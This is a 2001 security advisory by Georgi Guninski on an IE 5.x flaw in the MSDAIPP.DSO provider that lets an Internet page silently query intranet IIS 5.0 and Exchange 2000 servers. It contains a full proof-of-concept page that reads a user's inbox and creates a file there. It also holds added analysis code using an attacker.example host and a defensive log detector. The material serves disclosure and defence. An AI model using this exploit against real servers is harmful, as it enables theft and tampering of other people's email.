iemsdaipp.txt

Posted Mar 30, 2001
Authored by Georgi Guninski | Site guninski.com

Georgi Guninski security advisory #40 - Security bugs in interactions between IE 5.x, IIS 5.0 and Exchange 2000. If a malicious web page is browsed with IE it is possible to list the directories of arbitrary IIS 5.0 servers to which the browsing user has access. Under certain circumstances it is also possible to read the user's email or folders if it is stored on an Exchange 2000 server with web storage (it uses IIS 5.0). It is also possible to create (or probably modify) files on the Exchange 2000 server with web storage. Example exploit included.

tags | exploit, web, arbitrary
SHA-256 | 205a751214009b7efd4735ff3f131ee63a782759f29f253d522602889ff54916

   guninski@guninski.com Georgi Guninski security advisory #40, 2001

Security bugs in interactions between IE 5.x, IIS 5.0 and Exchange 2000

Systems affected:
The bug is in IE 5.x (Win2K, probably others), but interaction with IIS 5.0 (or Exchange web storage) is required.

Risk: High
Date: 28 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The information in this advisory is believed to be true based on experiments though it may be
false.
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
If a malicious web page is browsed with IE it is possible to list the directories of arbitrary
IIS 5.0 servers to which the browsing user has access. Under certain circumstances it is also
possible to read the user's email or folders if it is stored on an Exchange 2000 server with
web storage (which runs on IIS 5.0).
It is also possible to create (or probably modify) files on the Exchange 2000 server with web
storage.

Details:

This is a complex problem and I am too busy to write a lengthy advisory.
The problem seems to be the "Microsoft OLE DB Provider for Internet Publishing" (MSDAIPP.DSO).
Basically it gives script (through ADO) an interface for accessing and manipulating objects on
IIS 5.0 or web storage.
The problem is that it allows connecting to arbitrary servers, not only to the server from which
the HTML page was loaded, so a page from the Internet can drive requests to an intranet server.
What is worse, if the IIS 5.0 server is in the "Local intranet zone", IE by default
authenticates to it automatically with the browsing user's credentials, without prompting the
user.
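The two conditions described above, as an added example (JavaScript runnable under Node, not code from the advisory): a parser for the ADO connection string, the same-origin comparison that the provider does not perform between the page and its Data Source, and an approximation of IE's default zone mapping, where a host name without dots (such as INTRASERVER) lands in the Local intranet zone. It assumes no explicit per-zone site lists or proxy-bypass rules are configured, and the page URLs and host names it uses are constructed.

```javascript
// Added example, not part of the advisory: models why a page served from the Internet
// can drive MSDAIPP.DSO against an intranet server with the victim's credentials.
// Assumption: IE's default "include all local (intranet) sites not listed in other zones"
// rule, i.e. a dotless host name is intranet; no custom zone lists or proxy-bypass rules.

// Split "Provider=...;Data Source=..." into a lowercase-keyed map.
function parseConnectionString(cs) {
  const out = {};
  for (const part of cs.split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim().toLowerCase()] = part.slice(i + 1).trim();
  }
  return out;
}

// The check the provider lacked: scheme, host and port of the page vs. the Data Source.
function isSameOrigin(pageUrl, dataSourceUrl) {
  const a = new URL(pageUrl);
  const b = new URL(dataSourceUrl);
  return a.protocol === b.protocol &&
         a.hostname.toLowerCase() === b.hostname.toLowerCase() &&
         a.port === b.port;
}

// Approximation of IE's default zone for a URL that appears in no explicit zone list.
function defaultZone(dataSourceUrl) {
  const host = new URL(dataSourceUrl).hostname;
  return host.includes('.') ? 'Internet' : 'Local intranet';
}

// Evaluate a page/connection-string pair against the advisory's preconditions:
// MSDAIPP.DSO provider, cross-origin Data Source, and a target in the zone where IE
// logs on automatically with the current credentials.
function assess(pageUrl, connectionString) {
  const kv = parseConnectionString(connectionString);
  const provider = kv['provider'] || '';
  const dataSource = kv['data source'] || '';
  const crossOrigin = !isSameOrigin(pageUrl, dataSource);
  const zone = defaultZone(dataSource);
  const silentAuth = zone === 'Local intranet'; // IE default: automatic logon only in intranet zone
  return {
    provider, dataSource, crossOrigin, zone, silentAuth,
    exploitable: /^MSDAIPP\.DSO/i.test(provider) && crossOrigin && silentAuth,
  };
}

// Constructed inputs: the advisory's connection string, hosted on an Internet site.
const INBOX = 'Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox';
console.log(assess('http://attacker.example/msdaippdemo.html', INBOX));
console.log(assess('http://attacker.example/msdaippdemo.html',
  'Provider=MSDAIPP.DSO.1;Data Source=http://mail.example.com/exchange/USERNAME/inbox'));
```

With the advisory's dotless INTRASERVER the report comes back cross-origin, intranet zone, silent authentication; the same mailbox path on a fully qualified host is classified Internet and IE would prompt instead, which is why the attacker needs the intranet name the victim actually uses.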

Here is Microsoft's response to my initial report to them
(I sent them a similar and earlier version of the example below)
-----------------------------------------------------------------------------
From: "Microsoft Security Response Center" <secure@microsoft.com>
Hello Georgi,

Thanks for your note. We would appreciate a little more detail as to
what you think can be done with this. If at all possible please lay out
all the parameters when you do go public so you are not just scaring
people with your rankings. Not sure how you can actually exploit this
especially in e-mail in restricted sites zone with all scripting turned
off. Visiting malicious web sites is not real exploit scenario and if
the Intranet zone which is a trusted zone is locked down what can you
do?
.............
-----------------------------------------------------------------------------

So here is an example.

The following example, msdaippdemo.html, works for me; I don't know whether it works for you,
let me know if it does not.
msdaippdemo.html may reside anywhere on the Internet.
It contains two "variables" that must be changed: INTRASERVER and USERNAME.
If msdaippdemo.html is browsed with IE 5.x by user USERNAME (in the NT DOMAIN) and INTRASERVER
is IIS 5.0 with Exchange 2000 web storage
(note: INTRASERVER must be a name which is in the "Local intranet zone" in the context of
USERNAME),
then an attacker may obtain all the messages in USERNAME's inbox and send them to an arbitrary
server (the demo below only displays them in a new window), and in addition a file
"newlycreatedfile.html" shall be created in USERNAME's inbox.
For the attack to succeed the attacker must know the names INTRASERVER and USERNAME (and
change them in msdaippdemo.html).
But if the attacker is an insider in the NT DOMAIN he knows both of them, so basically it
allows playing with other people's Exchange 2000 web storage mailboxes.
If INTRASERVER is running just plain IIS 5.0 with the Indexing Service enabled, a directory
listing shall be obtained if you edit the example a little: change the connection string to
"Data Source=http://INTRASERVER/".
--msdaippdemo.html-------------------------------------------------------------
<HTML>
Written by Georgi Guninski
<SCRIPT>
function f()
{
// ADO connection through the OLE DB Provider for Internet Publishing (MSDAIPP.DSO).
// The Data Source is an arbitrary URL, not the origin of this page; IE authenticates
// to it silently when INTRASERVER is in the Local intranet zone.
conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox';
//change INTRASERVER and USERNAME with real values
rec=new ActiveXObject("ADODB.Record");
conn.Open();
rs=new ActiveXObject("ADODB.Recordset");
// SCOPE() is the folder the connection points at, i.e. USERNAME's inbox
rs.Open("SELECT * from SCOPE()",conn);
win=window.open("about:blank");
win.document.open();
// DISPLAYS ALL MESSAGES FROM USER'S INBOX
while (!rs.EOF)
{
for(i=0;i<rs.Fields.Count;i++)
{
win.document.writeln(rs.Fields(i).Name+"="+rs.Fields(i).Value+"<BR>");
}
rs.MoveNext();
}
// Mode 3 = adModeReadWrite, CreateOptions 0 = adCreateNonCollection:
// creates a new (non-folder) item relative to the connection's Data Source
rec.Open ("newlycreatedfile.html",conn,3,0);
//create file newlycreatedfile.html
win.document.close();
}
// run after the page has loaded
setTimeout("f()",1000);
</SCRIPT>
</HTML>
---------------------------------------------------------------
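A server-side check to go with the example, added here and not part of the advisory. What msdaippdemo.html does on INTRASERVER arrives as WebDAV requests from the OLE DB provider rather than from a browser, so the IIS 5.0 log on the Exchange server is the place to look for it. The script (JavaScript, runnable under Node) parses W3C extended log lines and groups the provider's DAV requests against /exchange/ by client address and authenticated user. Assumptions: the provider announces itself with a User-Agent beginning "Microsoft Data Access Internet Publishing Provider", the folder open, the SCOPE() query and the record creation show up as PROPFIND, SEARCH and PUT respectively, and the log carries the fields shown in the sample; the log lines themselves are constructed.

```javascript
// Added detection example, not part of the advisory. Scans IIS 5.0 W3C extended
// log lines for WebDAV requests to the Exchange web storage that come from the
// OLE DB Internet Publishing provider instead of a browser.
// Assumptions: provider User-Agent prefix as below; the advisory's page produces
// PROPFIND (open folder), SEARCH (SCOPE() query) and PUT (new record).

// Constructed sample log: one provider-driven session plus normal browser traffic.
const SAMPLE_LOG = `#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-03-28 10:12:01 10.1.2.3 DOMAIN\\USERNAME PROPFIND /exchange/USERNAME/inbox - 207 Microsoft+Data+Access+Internet+Publishing+Provider+DAV
2001-03-28 10:12:02 10.1.2.3 DOMAIN\\USERNAME SEARCH /exchange/USERNAME/inbox - 207 Microsoft+Data+Access+Internet+Publishing+Provider+DAV
2001-03-28 10:12:03 10.1.2.3 DOMAIN\\USERNAME PUT /exchange/USERNAME/inbox/newlycreatedfile.html - 201 Microsoft+Data+Access+Internet+Publishing+Provider+DAV
2001-03-28 10:15:40 10.1.2.9 DOMAIN\\alice GET /exchange/alice/inbox - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
2001-03-28 10:15:41 10.1.2.9 DOMAIN\\alice PROPFIND /exchange/alice/inbox - 207 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
`;

// Parse W3C extended format: the #Fields directive names the columns, IIS encodes
// spaces inside a field as '+', so a plain split on ' ' recovers the columns.
function parseW3cLog(text) {
  let fields = null;
  const rows = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line) continue;
    if (line.startsWith('#Fields:')) {
      fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith('#') || !fields) continue;
    const cols = line.split(' ');
    const row = {};
    fields.forEach((f, i) => { row[f] = cols[i] === undefined ? '-' : cols[i]; });
    rows.push(row);
  }
  return rows;
}

const PROVIDER_UA = /^Microsoft\+Data\+Access\+Internet\+Publishing\+Provider/i; // assumption
const DAV_METHODS = new Set(['PROPFIND', 'PROPPATCH', 'SEARCH', 'PUT', 'MKCOL', 'DELETE', 'MOVE', 'COPY']);

// Group provider-originated DAV requests under /exchange/ by (client IP, user);
// record which methods were used and which resources were written.
function findProviderAccess(rows) {
  const byActor = new Map();
  for (const r of rows) {
    if (!PROVIDER_UA.test(r['cs(User-Agent)'] || '')) continue;
    if (!DAV_METHODS.has(r['cs-method'])) continue;
    if (!/^\/exchange\//i.test(r['cs-uri-stem'] || '')) continue;
    const key = `${r['c-ip']} ${r['cs-username']}`;
    if (!byActor.has(key)) {
      byActor.set(key, { ip: r['c-ip'], user: r['cs-username'], methods: [], writes: [] });
    }
    const actor = byActor.get(key);
    actor.methods.push(r['cs-method']);
    if (r['cs-method'] === 'PUT' || r['cs-method'] === 'MKCOL') actor.writes.push(r['cs-uri-stem']);
  }
  return [...byActor.values()];
}

for (const hit of findProviderAccess(parseW3cLog(SAMPLE_LOG))) {
  console.log(`${hit.user} from ${hit.ip}: ${hit.methods.join(',')}; wrote ${hit.writes.join(',') || 'nothing'}`);
}
```

The discriminator is the User-Agent, not the method: Outlook Web Access on IE 5 also issues PROPFIND and SEARCH from the browser, as the alice lines show, and the victim's own credentials appear in cs-username either way. A PUT into a mailbox from the provider is the strongest single signal, matching the newlycreatedfile.html side effect in the advisory.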

Workaround: To solve this particular issue disable Active Scripting, though I do not
recommend using IE for browsing the Internet because this is dangerous.

Note: secure@microsoft.com wrote "Visiting malicious web sites is not real exploit scenario"

Vendor status:
Microsoft was informed on 22 March 2001